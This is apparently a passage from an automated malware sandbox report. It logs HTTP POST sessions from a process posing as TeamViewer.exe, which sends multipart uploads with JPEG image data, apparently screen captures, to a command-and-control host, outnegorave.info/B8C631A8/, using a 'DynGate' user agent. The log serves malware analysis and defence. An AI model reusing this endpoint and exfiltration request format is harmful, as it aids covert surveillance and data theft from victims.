                                                                                                                                    2021-09-15 11:52:38 UTC2467OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:52:38 UTC2483OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:52:38 UTC2499OUTData Raw: 16 92 8a 5a 00 28 a2 8a 00 5a 05 25 19 a6 21 d4 52 52 d3 00 a2 8a 5a 04 14 b4 51 8a 62 16 96 92 8a 62 03 4a 29 29 45 00 28 a4 a5 14 86 98 82 96 92 81 48 07 0a 70 a6 d2 d5 21 31 68 a4 a5 a6 02 d1 45 14 12 2d 14 51 4c 02 8a 28 a0 43 85 2d 34 52 8a 68 05 a5 a4 a5 a6 48 52 d2 52 8a 60 2d 14 51 4c 42 d1 49 4b 40 82 96 92 96 9a 01 d4 52 0a 5a 64 85 28 a2 8a 60 2d 14 0a 5a 62 12 92 96 8a 00 41 d6 9f 4c 1d 69 f4 20 61 41 a2 8a 64 80 a5 a4 14 ec 50 81 8a 05 3a 9b 4e 15 48 96 27 7a 5a 43 d6 9c 29 80 82 9d 4d a5 14 c4 c5 a2 8a 28 10 0a 5a 41 4e a6 21 29 d4 94 53 06 3a 96 9a 29 69 92 3b 34 a2 9b 4a 29 a1 31 c2 96 9b 4e 14 c9 61 4b 49 45 31 0b 45 25 2d 00 14 b4 94 b4 00 b4 b4 da 75 02 61 4a 29 29 68 10 b4 52 52 d0 20 a5 a2 8a 60 14 a2 8a 51 40 98 b4 0a 4a 51 40 8d 0d
                                                                                                                                    Data Ascii: Z(Z%!RRZQbbJ))E(Hp!1hE-QL(C-4RhHRR`-QLBIK@RZd(`-ZbALi aAdP:NH'zZC)M(ZAN!)S:)i;4J)1NaKIE1E%-uaJ))hRR `Q@JQ@
                                                                                                                                    2021-09-15 11:52:38 UTC2515OUTData Raw: a5 a6 02 d1 49 4b 40 0b 45 25 2d 31 0b 45 25 2d 02 16 94 52 52 d3 10 51 49 4b 4c 05 a5 a6 d2 d0 21 c2 8a 4a 5a a1 0a 29 69 b9 a5 a6 21 d9 a5 a6 d2 d0 21 c2 94 53 69 41 aa 4c 96 48 28 a4 06 8a a4 48 b4 b4 94 66 98 58 5c d1 9a 41 4b 45 c5 61 45 2e 69 94 b9 a7 70 b0 fc d2 d3 33 4b 9a 64 d8 70 a5 cd 37 34 53 b8 58 7e 68 cd 37 34 6e f6 a2 e2 b1 20 34 b9 a8 f7 1f 5a 33 ef 4e e2 b1 26 45 19 a8 f3 4b 9a 2e 2b 0f cd 19 a6 e6 8c d3 b8 58 75 2e 69 b4 66 8b 8a c3 b3 4b 9a 66 68 cd 3b 85 87 e6 8c d3 37 52 6e a2 e1 ca 49 9a 33 51 ee a3 75 2b 87 29 26 ea 4d d5 11 7a 69 7a 1c 86 a0 4c 5a 9a 5e a2 2f 4d 2d 52 e6 52 81 29 7a 61 7a 8c b5 30 b5 43 91 6a 04 85 fd e9 85 a9 85 a9 85 aa 1c 8d 14 47 96 a6 16 a6 96 a6 16 ac dc 8d 14 47 13 4c 26 90 9a 4a 86 cb 48 52 69 29 28 cd 26
                                                                                                                                    Data Ascii: IK@E%-1E%-RRQIKL!JZ)i!!SiALH(HfX\AKEaE.ip3Kdp74SX~h74n 4Z3N&EK.+Xu.ifKfh;7RnI3Qu+)&MzizLZ^/M-RR)zaz0CjGGL&JHRi)(&
                                                                                                                                    2021-09-15 11:52:38 UTC2531OUTData Raw: 96 97 05 bb 7f 6a 4d 25 dc ee b8 ca 31 45 4f a6 39 27 eb f9 57 3d af fc 35 d4 2c f7 4d a4 49 f6 d8 47 3e 5b 61 65 1f d1 bf 4f a5 33 c4 1f 0e 35 1b 0d d3 69 4c 6f a0 1c ec 03 12 a8 fa 7f 17 e1 cf b5 74 1e 11 f0 36 86 6d 63 be b9 97 fb 46 43 d5 19 76 a4 6d dd 4a 75 c8 ee 1b f2 a4 07 95 cd 14 90 4a d1 4f 1b c7 22 1c 32 3a 90 41 f7 06 99 5d 1f c4 24 48 fc 6b 7e 91 aa a2 28 88 05 51 80 07 94 95 ce 55 08 2a de 9b 64 d7 d7 42 30 76 a0 e5 db d0 55 4a e8 3c 2f b7 17 20 f5 f9 7f 2e 6a 64 ec b4 22 a5 45 4d 73 b5 7b 1b 96 7a 35 b8 4d 96 d6 62 4d a3 92 53 71 fc 6a be a1 e1 c1 70 ac 23 b5 68 66 1d 0a a1 1f 98 ad d1 bf fb 36 dc 45 93 18 ce fc 7f 7f 3d ff 00 0c 56 de 9b e6 fd 85 3c fc ee c9 db bb ae de df d6 b0 c4 d2 95 0c 3a c4 29 6b d8 f4 61 8e a7 5a 7e ca 30 f7 4f 16
                                                                                                                                    Data Ascii: jM%1EO9'W=5,MIG>[aeO35iLot6mcFCvmJuJO"2:A]$Hk~(QU*dB0vUJ</ .jd"EMs{z5MbMSqjp#hf6E=V<:)kaZ~0O
                                                                                                                                    2021-09-15 11:52:38 UTC2533OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 32 31 36 33 36 36 32 35 32 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------1216366252--
                                                                                                                                    2021-09-15 11:52:39 UTC2533INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:52:39 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=77bda5ed534eec2b6c6b73faeeaa3fa3e760d97ce32a872709c93ae14510df4f; expires=Thu, 15-Sep-2022 11:52:38 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=BIGqQIGeyiFgo4w071TmLdR0uoRXaRIgQDzyFGT20EZppU1n58hJ3HfMsdLmodBQjq1o%2Fu0OtrgYsOMvGYctvw8JUGjRm8KMZILKIJzpIaX1rL4NkKtXsoTUnrXmdLExEkLe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a6699c8864fd-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:52:39 UTC2534INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    3192.168.2.549760172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:51:56 UTC258OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 84988
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------175819007
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:51:56 UTC258OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 35 38 31 39 30 30 37 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------175819007Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:51:56 UTC258OUTData Raw: 9b d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 9b 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 cd c9 a7 51 fe d1 49 1a 5e c2 70 95 e1 35 5f 84 67
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcKQI^p5_g
                                                                                                                                    2021-09-15 11:51:56 UTC258OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:51:56 UTC274OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
                                                                                                                                    2021-09-15 11:51:56 UTC290OUTData Raw: 8f fb 35 c0 5d 1f de 37 d6 b9 70 1b c8 f4 f3 07 f0 1d 45 b7 fc 8a b1 ff 00 9e f5 90 f5 ad 01 ff 00 8a 52 2f f3 de b1 9d 8e 6a a8 2d 65 ea 61 8c 7a 47 d0 63 12 3a 1a 03 b0 e8 c6 93 39 a4 ae bb 1e 67 33 24 13 b8 ef 9a 77 9e 0f de 40 6a 1a 29 72 a2 94 da 25 3e 43 7d e4 c5 21 b6 81 ba 1c 54 74 51 67 d1 8d 55 7d 41 b4 f5 3f 75 85 44 da 7c 83 a7 35 36 4f 50 6a 45 91 c7 f1 1a 2f 24 5a 9a 33 da d6 55 ea a6 a3 31 b0 ea 0d 6c 09 5b b8 14 ed c8 7e f2 03 4f da 35 d0 d1 6b d4 c3 20 8e c6 92 b6 cc 36 ef d5 71 4c 36 10 b7 dd 6c 53 f6 a8 76 66 3d 15 a6 da 59 fe 16 06 a1 7d 3e 65 e8 b9 a6 aa 47 b8 59 94 e8 a9 9a da 55 ea 87 f2 a8 8a 30 ea 0d 5a 69 88 4a 28 c5 14 c0 29 69 28 a0 43 a9 73 4d a5 14 08 75 4f 7c 7f e2 9a 6f fa ea 2a b8 a9 af cf fc 53 4c 3f e9 b0 ac 31 1b 23 7c
                                                                                                                                    Data Ascii: 5]7pER/j-eazGc:9g3$w@j)r%>C}!TtQgU}A?uD|56OPjE/$Z3U1l[~O5k 6qL6lSvf=Y}>eGYU0ZiJ()i(CsMuO|o*SL?1#|
                                                                                                                                    2021-09-15 11:51:56 UTC306OUTData Raw: 14 00 0a 5a 28 a0 02 96 92 96 98 83 bd 14 51 40 06 69 69 29 68 01 68 a4 a5 a6 21 28 a5 34 94 00 51 45 14 00 51 45 14 00 b4 94 52 d0 01 45 14 50 02 d0 29 28 cd 31 0e a2 92 96 98 05 14 52 d0 20 a5 a2 8c 53 10 b4 b4 94 53 10 1a 51 49 4a 28 01 45 25 28 a4 34 c4 14 b4 94 0a 40 38 53 85 36 96 a9 09 8b 45 25 2d 30 16 8a 28 a0 91 68 a2 8a 60 14 51 45 02 1c 29 69 a2 94 53 40 2d 2d 25 2d 32 42 96 92 94 53 01 68 a2 8a 62 16 8a 4a 5a 04 14 b4 94 b4 d0 0e a2 90 52 d3 24 29 45 14 53 01 68 a0 52 d3 10 94 94 b4 50 02 0e b4 fa 60 eb 4f a1 03 0a 0d 14 53 24 05 2d 20 a7 62 84 0c 50 29 d4 da 70 aa 44 b1 3b d2 d2 1e b4 e1 4c 04 14 ea 6d 28 a6 26 2d 14 51 40 80 52 d2 0a 75 31 09 4e a4 a2 98 31 d4 b4 d1 4b 4c 91 d9 a5 14 da 51 4d 09 8e 14 b4 da 70 a6 4b 0a 5a 4a 29 88 5a 29 29
                                                                                                                                    Data Ascii: Z(Q@ii)hh!(4QEQEREP)(1R SSQIJ(E%(4@8S6E%-0(h`QE)iS@--%-2BShbJZR$)EShRP`OS$- bP)pD;Lm(&-Q@Ru1N1KLQMpKZJ)Z))
                                                                                                                                    2021-09-15 11:51:56 UTC322OUTData Raw: 29 88 5a 28 a2 81 0b 46 69 05 2d 30 16 8a 4a 5a 00 5a 29 29 69 88 5a 29 29 68 10 b4 a2 92 96 98 82 8a 4a 5a 60 2d 2d 36 96 81 0e 14 52 52 d5 08 51 4b 4d cd 2d 31 0e cd 2d 36 96 81 0e 14 a2 9b 4a 0d 52 64 b2 41 45 20 34 55 22 45 a5 a4 a3 34 c2 c2 e6 8c d2 0a 5a 2e 2b 0a 29 73 4c a5 cd 3b 85 87 e6 96 99 9a 5c d3 26 c3 85 2e 69 b9 a2 9d c2 c3 f3 46 69 b9 a3 77 b5 17 15 89 01 a5 cd 47 b8 fa d1 9f 7a 77 15 89 32 28 cd 47 9a 5c d1 71 58 7e 68 cd 37 34 66 9d c2 c3 a9 73 4d a3 34 5c 56 1d 9a 5c d3 33 46 69 dc 2c 3f 34 66 99 ba 93 75 17 0e 52 4c d1 9a 8f 75 1b a9 5c 39 49 37 52 6e a8 8b d3 4b d0 e4 35 02 62 d4 d2 f5 11 7a 69 6a 97 32 94 09 4b d3 0b d4 65 a9 85 aa 1c 8b 50 24 2f ef 4c 2d 4c 2d 4c 2d 50 e4 68 a2 3c b5 30 b5 34 b5 30 b5 66 e4 68 a2 38 9a 61 34 84 d2
                                                                                                                                    Data Ascii: )Z(Fi-0JZZ))iZ))hJZ`--6RRQKM-1-6JRdAE 4U"E4Z.+)sL;\&.iFiwGzw2(G\qX~h74fsM4\V\3Fi,?4fuRLu\9I7RnK5bzij2KeP$/L-L-L-Ph<040fh8a4
                                                                                                                                    2021-09-15 11:51:56 UTC338OUTData Raw: 0e 9f bd 7e 8d fd 3a 50 c6 26 93 f0 cb 4b 82 dd bf b5 26 92 ee 77 5c 65 18 a2 a7 d3 1c 93 f5 fc ab 9e d7 fe 1a ea 16 7b a6 d2 24 fb 6c 23 9f 2d b0 b2 8f e8 df a7 d2 99 e2 0f 87 1a 8d 86 e9 b4 a6 37 d0 0e 76 01 89 54 7d 3f 8b f0 e7 da ba 0f 08 f8 1b 43 36 b1 df 5c cb fd a3 21 ea 8c bb 52 36 ee a5 3a e4 77 0d f9 52 03 ca e6 8a 48 25 68 a7 8d e3 91 0e 19 1d 48 20 fb 83 4c ae 8f e2 12 24 7e 35 bf 48 d5 51 14 44 02 a8 c0 03 ca 4a e7 2a 84 15 6f 4d b2 6b eb a1 18 3b 50 72 ed e8 2a a5 74 1e 17 db 8b 90 7a fc bf 97 35 32 76 5a 11 52 a2 a6 b9 da bd 8d cb 3d 1a dc 26 cb 6b 31 26 d1 c9 29 b8 fe 35 5f 50 f0 e0 b8 56 11 da b4 33 0e 85 50 8f cc 56 e8 df fd 9b 6e 22 c9 8c 67 7e 3f bf 9e ff 00 86 2b 6f 4d f3 7e c2 9e 7e 77 64 ed dd d7 6f 6f eb 58 62 69 4a 86 1d 62 14 b5
                                                                                                                                    Data Ascii: ~:P&K&w\e{$l#-7vT}?C6\!R6:wRH%hH L$~5HQDJ*oMk;Pr*tz52vZR=&k1&)5_PV3PVn"g~?+oM~~wdooXbiJb
                                                                                                                                    2021-09-15 11:51:56 UTC341OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 31 37 35 38 31 39 30 30 37 2d 2d 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------175819007--
                                                                                                                                    2021-09-15 11:51:58 UTC341INHTTP/1.1 200 OK
                                                                                                                                    Date: Wed, 15 Sep 2021 11:51:58 GMT
                                                                                                                                    Content-Type: application/json; charset=UTF-8
                                                                                                                                    Content-Length: 48
                                                                                                                                    Connection: close
                                                                                                                                    x-powered-by: PHP/5.6.40
                                                                                                                                    set-cookie: X-Csrf-Token=7023cd6dc2b381ce2e8efe191c152ba63bd2eb3c0bdf797e643c32c8f3813513; expires=Thu, 15-Sep-2022 11:51:56 GMT; Max-Age=31536000; httponly
                                                                                                                                    CF-Cache-Status: DYNAMIC
                                                                                                                                    Expect-CT: max-age=604800, report-uri="https://report-uri.cloudflare.com/cdn-cgi/beacon/expect-ct"
                                                                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gwrwnNwxfXqGpj5YQbvaN9SdhR2%2BRJRO0zGEL4O0MPjriOVR41fQBmOyZPymVSNWFcDjk6bArv%2BxOIDFmhszVG%2BhdffjkvJK%2FQwS%2BQYXApNYaoHKcQnn6w2GCDoQIi5Cq0Xe"}],"group":"cf-nel","max_age":604800}
                                                                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                                                    Server: cloudflare
                                                                                                                                    CF-RAY: 68f1a5620c1642d5-FRA
                                                                                                                                    alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400, h3-28=":443"; ma=86400, h3-27=":443"; ma=86400
                                                                                                                                    2021-09-15 11:51:58 UTC342INData Raw: 57 32 ac 58 a5 26 2a c4 fe c5 03 3c 73 26 aa ff 19 f1 5b 1c 3e 2b f5 6e 56 49 b0 73 31 fd 2b 71 bf 8b 7e 8c c7 87 ea 9b a3 6d 0b c4 21 75 1e 56
                                                                                                                                    Data Ascii: W2X&*<s&[>+nVIs1+q~m!uV


                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                                                                    30192.168.2.549821172.67.205.33443C:\Users\user\AppData\Roaming\TeamViewer\TeamViewer.exe
                                                                                                                                    TimestampkBytes transferredDirectionData
                                                                                                                                    2021-09-15 11:52:39 UTC2534OUTPOST /B8C631A8/ HTTP/1.1
                                                                                                                                    Content-Length: 85015
                                                                                                                                    Content-Type: multipart/form-data; boundary=--------3636690275
                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; DynGate)
                                                                                                                                    Host: outnegorave.info
                                                                                                                                    Connection: Close
                                                                                                                                    Cache-Control: no-cache
                                                                                                                                    2021-09-15 11:52:39 UTC2535OUTData Raw: 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 33 36 33 36 36 39 30 32 37 35 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6b 22 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 70 6c 61 69 6e 0d 0a 43 6f 6e 74 65 6e 74 2d 54 72 61 6e 73 66 65 72 2d 45 6e 63 6f 64 69 6e 67 3a 20 62 69 6e 61 72 79 0d 0a 0d 0a
                                                                                                                                    Data Ascii: ----------3636690275Content-Disposition: form-data; name="k"Content-Type: text/plainContent-Transfer-Encoding: binary
                                                                                                                                    2021-09-15 11:52:39 UTC2535OUTData Raw: b1 d9 05 bb ab 2e 28 c5 ff c4 26 3c 63 26 a0 ff 19 e6 28 79 50 4e 94 09 81 02 3c 3b 5e 8e 05 18 d1 ed 11 8c 06 87 d2 d8 94 15 3b 85 19 5a 1e 56 7d e2 9e 04 9e ee a5 7d 68 11 2d 0c 5e f2 66 63 4b c1 95 f8 ef 84 9d bb fb 0f bd 80 17 0b 2b 94 2b f4 b7 66 1d b3 24 dd d1 5b ac c5 47 d8 09 b3 88 c4 ba 2e f6 a6 3a 2c 9c 8f 72 49 a7 8c 9e 60 9f bf d3 6c a7 bd c1 c6 2b ca 0d 24 15
                                                                                                                                    Data Ascii: .(&<c&(yPN<;^;ZV}}h-^fcK++f$[G.:,rI`l+$
                                                                                                                                    2021-09-15 11:52:39 UTC2535OUTData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 01 00 00 00 00 00 00 ff db 00 43 00 0d 09 0a 0b 0a 08 0d 0b 0a 0b 0e 0e 0d 0f 13 20 15 13 12 12 13 27 1c 1e 17 20 2e 29 31 30 2e 29 2d 2c 33 3a 4a 3e 33 36 46 37 2c 2d 40 57 41 46 4c 4e 52 53 52 32 3e 5a 61 5a 50 60 4a 51 52 4f ff db 00 43 01 0e 0e 0e 13 11 13 26 15 15 26 4f 35 2d 35 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f 4f ff c0 00 11 08 04 00 05 00 03 01 22 00 02 11 01 03 11 01 ff c4 00 1f 00 00 01 05 01 01 01 01 01 01 00 00 00 00 00 00 00 00 01 02 03 04 05 06 07 08 09 0a 0b ff c4 00 b5 10 00 02 01 03 03 02 04 03 05 05 04 04 00 00 01 7d 01 02 03 00 04 11 05 12 21 31 41 06 13 51 61 07 22 71 14 32 81 91 a1 08
                                                                                                                                    Data Ascii: JFIFC ' .)10.)-,3:J>36F7,-@WAFLNRSR2>ZaZP`JQROC&&O5-5OOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOOO"}!1AQa"q2
                                                                                                                                    2021-09-15 11:52:39 UTC2551OUTData Raw: 15 06 55 2c 87 62 e1 94 fa d7 91 eb ba 44 da 2e a0 d6 d2 c8 92 a7 58 e5 8c e5 5d 7d 7d 8f a8 ff 00 f5 d7 ad f9 da 77 fd 06 2f ff 00 ef b6 ff 00 e2 6b 96 f8 a6 54 db 68 85 1d 9d 4a 4b 86 6e ac 31 1f 26 9d 29 34 ec 2a 89 5a e7 9e 52 53 b0 29 31 5d 16 30 12 8a 5c 51 83 40 1b 9e 0b ff 00 91 bb 4e ff 00 ae bf d0 d7 b6 d7 89 78 2f fe 46 ed 37 fe ba ff 00 43 5e b9 24 22 e7 56 99 25 92 70 89 04 65 55 26 74 19 2d 26 4f ca 47 a0 fc ab 1a 8a f2 d4 d6 0e cb 43 46 aa de b6 c1 0b 95 66 55 93 9d aa 5b f8 58 74 1f 5a 85 6c ec de 57 89 2e 2e 5a 48 f1 bd 45 e4 b9 5c f4 cf cd 4f fe cd b7 ff 00 9e 97 7f f8 17 2f ff 00 15 59 da 3d ff 00 0f f8 25 de 5d bf 1f f8 07 9c f8 e7 43 b5 89 5f 55 b2 57 88 16 1e 6c 6d 13 28 24 9e a3 23 f4 ae 26 bd 4f c6 6e d2 7c 3d b7 79 18 b3 b0 80 b3
                                                                                                                                    Data Ascii: U,bD.X]}}w/kThJKn1&)4*ZRS)1]0\Q@Nx/F7C^$"V%peU&t-&OGCFfU[XtZlW..ZHE\O/Y=%]C_UWlm($#&On|=y
